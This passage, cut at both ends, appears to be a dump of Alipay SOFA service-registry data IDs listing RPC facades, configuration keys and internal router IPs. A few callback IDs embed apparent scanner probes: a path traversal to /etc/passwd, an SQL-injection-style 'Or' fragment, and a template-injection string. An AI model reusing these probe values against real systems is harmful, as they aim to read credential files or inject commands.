RM","com.alipay.nodejs.ConsumerService:1.0:qns@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.drm.ChannelFilterDRM.holdTimeRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditbatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@govbizwebdeploy#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mfinsnsprod.biz.service.gw.community.api.fund.FundManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:superlink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.154.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditauthasset.common.query.AuthAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuUserPrivacyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.prodmng.api.FundProductSeriesFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:minicenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.JiuzhouOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.api.VerifyResultFeedbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_TAXI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.revmng.common.service.facade.RevmngPricePrivScopeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetfluxdecision.biz.service.consult.YebInfoConsultProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.null:name=com.alipay.fraudmng.core.service.riskcontrol.resource.BatchOperateConfigResource.batchConCurrentMaxThread,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.bd.BdEmployeeOrganizationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mng.facade.merchantinfo.MerchantInfoMngWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zbdm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.api.ssu.SsuCheckForMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:deliverUnitAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iintegration.common.service.facade.api.InterfaceTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:minitrans_hvtrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CustomPrizeParamRuleManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.manage.api.ClearingRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:antpaascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.scene.SceneRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.app.AppServiceAccountServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-mservicesinspect-dispatch#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.160.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.bp.engine.service.BPQueryService:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmeteragecore.common.service.facade.TaskManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.qianli.common.service.neardata.facade.QianliQueryConfigFacade:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.121.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.onlineservice.OnlineServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.16.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insassetprod.common.service.facade.InsTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.clientStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.risk.UserRiskTestQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.serverlessplan.HuanyuServerlessPlanFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.graycore.biz.check.spi.DetectRegister:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.fundorder.FundOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testcenter.spi.api.ToolActionApi:1.0:rockcode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:liquadationBillOperationCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharity.common.service.facade.ClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransGoldenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.validateproduct.ValidateProductQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.aip.FundFixedQueryWrapFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.137.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.sync.WorkTicketServiceCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:�'\\tOr\\tantwebscansYW50=MzMwMjQ4NjktdW5pcXVlSWQtMTEwMDAyMDIy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.mobile.api.EnrollMerchantQueryMobileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.imif.common.service.facade.v2.ShopQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.riskmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_B_AIR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prodtrans.senior.manage.facade.ProdProductPropertyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.assets.shop.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfactory.common.service.facade.appx.task.CrawlerTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_GIFT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.zoloz.zhub.smilepay.SmileToAuthService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.204.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundboss.common.service.facade.alarm.AlarmConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.coc.ecomodel.api.search.GeneralSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:regression@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revmng.common.service.facade.RevmngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:antchaos_undifferentiated@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.test:name=com.alipay.securitydata.common.uctfo.storage.client.drm.UctfoStorageResource.tbaseRoute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finsign.common.service.facade.b2b.service.DigitalB2BSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acorchestracore.endpoint.sofarest.ServiceContainerRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ck:name=com.alipay.zdal.config.groupCluster.payment_config_datasource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.antschedulerconsole.facade.OperationRecordOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketMemberRuleAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.miniappkeep.MiniAppKeepPrincipalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_FDBUDGET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.aciaasconnectorcore.facade.conn.LogConn:1.0:0000000008@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icontrol.common.service.facade.IvrDispatchServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.simulated.api.SatransDailyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:acrmng-creditTempAuditCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.favor.api.InsCollectionFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.home.rpc.CardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.detect.DetectItemCheck:1.0:broadNameDetectItemCheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherRefundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.mrchlabcore.common.service.facade.api.order.ServiceOrderQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.equitypublishcore.common.service.facade.EquityProjectFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.UnifiedLimitQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","buaudit@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.242.167#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdalhbase:name=com.alipay.zdal.ldc.hbase.mydds.update,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.custcenterprod.facade.AcquireQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA-SCHEDULER-S-S-accagovernance-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cif:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianQueueMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirecenter.common.service.facade.api.MerchantCodePayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PSSLIP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.TaskRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.ruleConditions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@csvoice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.voucherprod.facade.api.experience.VcpExperienceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.TaskVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.client.policynotify.fetcher.PolicyNotifyFetcher:1.0:insusercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.biz.lfc.rpc.LifeCirclePBService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fascore.product.INST_FUND_ASSET@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.biz.service.antq.IotThingShadowHandler:1.0:iotDeviceAppInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.PromotionInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_EBPPGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.53.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zpipe.zqueue:qaZQueue48:onelevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.84.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.zoloz.zprod.face.service.usable.UsableReferenceSourceCheckFaceLdcService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dcepprod.core.service.manage.consume.ConsumeRefundManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finpwm.facade.productpkg.IndexQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.riskmng.common.service.facade.api.cscheck.RiskmngCsCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.overdraft.FundsRiskActionAdvice:1.0:swap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.FileBusinessRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.71.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-secbianque-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.api.antcloud.spring.AntCloudApiExplorer:1.0:antcloud.xboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.finpwm.FinpwmAutoInvestPlanManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbservcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.thirdkey.facade.ThirdKeyManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insclaiminvestcore.common.service.facade.service.recommend.TransportRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.manage.AduitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.91.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitAbilityTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:OPSGROUP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scsupport.common.service.facade.bizconfig.BizConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:{{101007039 1}}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppcore.facade.EbppOrderItemFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.PcreditBenefitAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arcstudio.common.service.facade.ClusterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.XtsConfigResource.depositActionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finzyprod.facade.loan.api.ZyApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:secrethbs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.pub.PublicManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.ipsponsorprod.common.service.facade.api.cashback.GoodsDetailSearchGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:mcomment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.dal.logsim.labtaskreplaymethodresult.OeEmulatorLabTaskReplayFacadeMethodResultDataRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.script.compatible.CompatibleChecker:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipay.rulemng.common.service.facade.RuleMappingManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.custstk:name=com.alipay.custstk.cache.ha.drm.CZoneTairHARuleDrm.cifneardata.customerv2.smartFoRealSwitcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.170.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoguard.common.service.facade.inspection.api.PcDivideInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:tiyubiz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mitemcenter.MitemcenterCookService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerCoBuildingTagsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliyun.apsarabase.euler.config.service.facade.api.ConfigRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantInstRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.user.UserSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.248.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oasis.common.service.facade.gateway.GatewayTrJsonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.cache.CacheClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.query.YebsTransferInOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:finfocore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.contract.api.ContractInfoManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openexprod.common.service.facade.PartnerSecurityOpenexprodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.zcache.tbase.processmngTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.MessageSpi:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightcore.common.service.facade.userinsight.api.WealthUserVisitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.travelProds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.105.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finlinkdata.common.service.facade.account.signaccount.service.SignAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.ManualDistListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.ugcpublisher.ContentUgcMaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:../../../../etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-kbomp-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:testkey@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcEventScheduleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inshealthcareprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yfd.common.service.facade.ds.YfdDataSetConfigLoadServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kmi.common.service.facade.SceneMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finfoprodProductPoolProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.130.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_192.168.3.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inscharityprod.common.service.facade.NewCharitySummaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.personalization.StrategyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.OdpsSearchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.koicamp.AutoMktKoiCampFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FinResultDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.BizDataPullFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.api.ApiManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.RiskHistoryLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.imagesimilarity.ImageSimilarityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insclaiminvestprod.facade.institution.InvestInstitutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.223.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insiop.common.service.facade.featureds.InsIopFeatureRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchasset_produceOrderCreateAndAssign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.ContractPerformanceExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.himalayas.services.crm.facade.customer.IntegrationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinstockprod.common.service.facade.api.UserAssetServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.AlarmTagSettingFacade:1